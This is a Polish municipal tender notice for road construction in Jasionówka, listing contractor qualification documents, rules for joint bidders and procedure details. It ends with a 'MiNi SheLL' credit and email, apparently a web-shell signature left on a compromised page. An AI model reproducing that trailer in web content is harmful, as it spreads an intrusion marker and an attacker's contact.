1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  - zał. nr 4. 

3. W celu potwierdzenia spełniania warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
1) dokumenty zawierające dane o wartości i terminie realizacji oraz potwierdzające należyte wykonanie dotychczasowych robót budowlanych (zrealizowanie co najmniej 3 robót budowlanych dotyczących przebudowy lub budowy dróg o łącznej długości co najmniej 1000 m, lub ulic o łącznej długości co najmniej 400 m w okresie nie dłuższym niż ostatnie 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie); roboty budowlane powinny odpowiadać swoim rodzajem i zakresem robotom stanowiących przedmiot zamówienia;
2) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (kierownicy budowy) posiadają uprawnienia budowlane w specjalnościach drogowej i instalacyjnej zgodnie z zakresem planowanych do realizacji robót  wraz z załączeniem do oferty uprawnień oraz aktualnego na dzień składania ofert zaświadczenia o przynależności do właściwej izby samorządu zawodowego;
3) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca.

4. W celu potwierdzenia spełniania warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

Wymagane dokumenty, o których mowa powyżej Wykonawca przedstawi w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

5. Wykonawca mający siedzibę lub zamieszkały poza terytorium Rzeczpospolitej Polskiej:
1) zamiast dokumentów, o których mowa w Rozdziale VII ust. 2 pkt 1 i 2 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)  nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1), zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w pkt 1).

6.  Wykonawcy wspólnie ubiegający się o zamówienie:
1)  ponoszą solidarną odpowiedzialność za wykonanie lub nienależyte wykonanie zamówienia;
2)  zobowiązani są do ustanowienia pełnomocnika, ofertę podpisuje pełnomocnik;
3) do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do   reprezentowania w postępowaniu i zawarciu umowy;
4)   pełnomocnictwo musi mieć formę pisemną;
5)   wszelka korespondencja prowadzona będzie z pełnomocnikiem;
6)  jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców;
7) termin na jaki została zawarta umowa regulująca współpracę Wykonawców występujących wspólnie nie może być krótszy od terminu określonego na wykonanie zamówienia wydłużony o okres gwarancji i rękojmi;
8)  oferta winna zawierać dokumenty określone w rozdziale VII ust. 2 pkt 1) i 2)  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie;
9)  przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jasionowka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jasionówce, ul. Rynek 19, 19-122 Jasionówka w pok. Nr 9..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2009 godzina 10:00, miejsce: Urząd Gminy Jasionówka
ul. Rynek 19
19-122 Jasionówka 
(sekretariat) w pok. Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com